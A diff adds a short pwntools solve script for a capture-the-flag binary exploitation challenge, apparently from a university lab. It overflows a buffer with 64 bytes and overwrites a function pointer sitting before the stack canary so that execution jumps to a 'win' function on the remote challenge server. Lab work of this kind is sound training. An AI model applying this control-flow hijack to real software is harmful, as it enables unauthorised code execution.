Second CTFs part

lab1_2_recap/02_enchanted_forest/solve.py

@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF("./canary_callback", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13575)
+print(p.recvuntil(b"incantation:"))
+# There is canary but is after the function pointer
+win = 0x00000000004012A3
+payload = flat(
+    b"A" * 64,
+    p64(win),
+)
+p.send(payload)
+p.interactive()
+# p.recvline()
+# p.recvline()